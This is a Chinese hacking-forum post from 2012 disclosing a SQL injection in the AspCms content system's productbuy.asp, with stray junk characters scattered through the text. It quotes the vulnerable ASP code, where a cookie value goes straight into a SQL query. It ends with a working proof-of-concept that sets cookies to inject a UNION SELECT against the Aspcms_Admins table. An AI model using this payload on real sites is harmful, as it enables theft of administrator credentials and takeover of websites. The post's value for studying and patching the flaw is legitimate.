好久没上土司了,上来一看发现在删号名单内....., z/ N. \2 _0 o
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
1 h! H3 d$ n0 W* c" J废话不多说,看代码:8 A2 l( D0 [' P; o6 W$ d& {
* F( v5 b) p/ {6 O. C" Z, N! T& V
<%- N4 ]5 `. c, r6 O' v$ _
! m0 T9 Z% m% M/ T
if action = "buy" then
2 U q% b& \/ r
$ a! x8 Z' d/ f) j$ o addOrder()
" w k* R7 j- E V3 F" Z9 f' s4 ?2 D' O6 }
else8 {+ K) g) Z, K1 }8 T7 G
& y1 P& v/ d% L' H9 f! f1 h
echoContent()0 ~, ~2 ]' [# C8 R: i0 u
0 `5 i# T+ G2 ^) C# o7 wend if
: X; W5 G ?; n' N9 |! L: Q' u' R% W. m& r, Q# _. `
) z1 A" j5 \4 T3 d; G/ h! X0 f, S( n
……略过 n% k+ y+ }: a' X+ D8 k0 L
4 D% b( b; p# u* E& s d: X
" S# t+ p& B2 q! ]5 T; H; O" D. t$ d# H5 q: O4 b
Sub echoContent()
. p b+ F- D7 Y+ C0 u" ?- Y6 o$ E0 t# ~0 b
dim id
z7 V, {9 p% o. R! X% }
( x" f4 j* S' v id=getForm("id","get")
" J/ ~$ D: ^" s3 N2 `2 y1 n3 L- m, G, `+ y, c
: ?- {! s! f0 W9 N3 d* x/ ~& c5 H% J4 e0 j
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
* h! u; u$ Q8 d y j# M; V% L
2 f( v* [, O2 O# e% n4 F4 C% [( [ 2 O, w% X* U" r) h/ L1 h
. K9 k9 ]; Z# X3 X9 }) X5 v
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")' i2 i$ X) t( o
6 _, j9 {$ l. L% ?
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
1 X! v+ v9 W! e4 r2 Q8 g: ^4 Z v/ J$ s. y2 L `
Dim templatePath,tempStr; ^; e' D' n( E$ @
; S+ ^# [4 S# M, Z$ V& V- V5 }; L
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"6 i! X5 p0 h) u
& s6 \4 W( y1 K: {* A- D' v% S+ n& \2 N9 K2 b
) t* b& e7 q+ i" w( B8 ~3 M
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
$ t, G% A) V8 E& d* ~ x
7 B5 ^3 c# v/ ]) z8 U2 G! p selectproduct=rsObj(0)
. e3 l+ J2 T% N3 @7 l0 {' d1 k: v! a' @- C
; V* k" N4 E1 S: p- R
' ^: o# @+ L9 Y
Dim linkman,gender,phone,mobile,email,qq,address,postcode
0 h# g" b2 S E4 s% @
- f/ ^) j1 r- w. e) a$ K if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
( o# l$ s" `/ ]- }/ C- \" v$ ?9 R& | ~* h& k
if rCookie("loginstatus")=1 then 1 X. e# t$ v# W2 _4 s
# ~9 V8 B+ R0 I6 I4 K set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")5 B& ?" D+ N+ V3 ^$ F$ t5 q
1 J' [* E% Y! u9 R linkman=rsObj("truename")
6 @& ]; N9 @1 [
2 n' P0 w( U* } gender=rsObj("gender")
; e4 O' u5 ?) z8 D; ^4 \9 q# U8 \% ~0 L3 u. g, A# M
phone=rsObj("phone")
0 J- g$ S& s$ y% n! q& k, a* l
1 m4 V, {4 H$ b mobile=rsObj("mobile")
2 Y0 L" l$ ] s$ I) O8 T+ c1 Z9 E& C
email=rsObj("email")
; A% j$ f/ I# V# p" x3 k) Q
0 d% o! w D( f, \ qq=rsObj("qq")7 P+ m* {' A1 z$ x
/ g& }. i6 C1 U6 l/ ]
address=rsObj("address")# B6 R4 b0 D# Q7 ~
: c9 @5 a0 C5 \4 L/ {" ^9 F
postcode=rsObj("postcode")
" O8 |8 E/ O7 e/ C( N/ h$ a. ]$ B8 q( p& Z% Q3 j
else $ I2 C+ s- T, r& h
4 O6 K, P) Z$ l k/ O gender=19 J$ D: _7 ?, C$ A& x( c3 e
) Z% w6 W9 u: I& _ end if4 T9 e7 d) E( H! f6 f0 J# c. v3 ~
) N. o3 l( r; ^ rsObj.close()
4 y: p6 T' r" }; u {/ H8 B1 X; K6 R: ^" A; a
! l- Y2 _' n z9 Q8 m. q/ U3 r
% M" H, R4 b. k. {& \& F6 y& h$ z
with templateObj 8 r. C# B! j6 c9 ~ O+ _9 ~/ p
$ ]; t8 L& v( W( q) i$ [ .content=loadFile(templatePath)
# t" ^( U) d1 L4 k% E: d2 b4 v. {5 _* P" `3 z# b! c
.parseHtml()
' Q3 M; `" v7 T% ?; r
5 U8 K8 N; G# n) l .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
" R R& {% P5 y' Y2 Q" e9 O1 e* e0 v
: l$ r8 B! p( z4 }+ a( u .content=replaceStr(.content,"[aspcms:linkman]",linkman)
7 `7 o1 K4 ?8 q" Z$ W- X+ c, O
$ Z% ?5 k3 m) H, L! _ .content=replaceStr(.content,"[aspcms:gender]",gender)
' ^* _+ d2 }( f( J3 E. {+ g5 y0 v
- {+ }6 K$ U" p4 N. x5 V" U$ L0 g .content=replaceStr(.content,"[aspcms:phone]",phone) * a- a6 d: {7 `
8 T& ^" v; |. e3 ^ .content=replaceStr(.content,"[aspcms:mobile]",mobile) 7 @% W7 A* Z+ e& D2 _$ D3 s
; j/ C# f8 x w$ y5 v$ H .content=replaceStr(.content,"[aspcms:email]",email)
# M* a$ P0 x$ {( H+ o/ P1 D. `' P, \' h- @$ X" k* n
.content=replaceStr(.content,"[aspcms:qq]",qq) 8 @7 I6 ~" A) U% v
8 f/ Y& c# y% K9 q( `9 ^8 {
.content=replaceStr(.content,"[aspcms:address]",address)
, D' f" [( {) D1 L/ {) c, C4 j8 Z8 e: S2 n0 r( z; Z* X
.content=replaceStr(.content,"[aspcms:postcode]",postcode) * b( O- }3 P- D/ S: b# z9 H& b: a
" d/ T8 C) E$ z
.parseCommon()
2 _% i1 X- a v9 Y% p/ G7 f( e% C5 O8 k& H3 b
echo .content
) V6 G5 P, u/ h# X$ [& i/ C$ |
U/ V" [( b6 M) J( ~+ c0 i0 h end with
6 G) a3 a- R: j/ z3 ]0 x" \2 {- Z! o) L) W* x; [" V
set templateobj =nothing : terminateAllObjects* [# p6 i& g7 B8 Y0 m# W$ B
7 i* h$ w# ~7 _6 n6 B! JEnd Sub
* e: b2 p$ Z& h0 C- l0 O7 m漏洞很明显,没啥好说的) B" e9 i9 R( i# F7 B7 Q4 }! l X3 H
poc:' x' [, ]5 e; _$ s( ?
) r( k3 d: G$ a# l; Q7 ]3 o
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子- ?) Q( r( j |1 N% [
1 @2 G2 N7 x7 L" u |
发表于 2012-12-27 08:35:05
收藏
支持
反对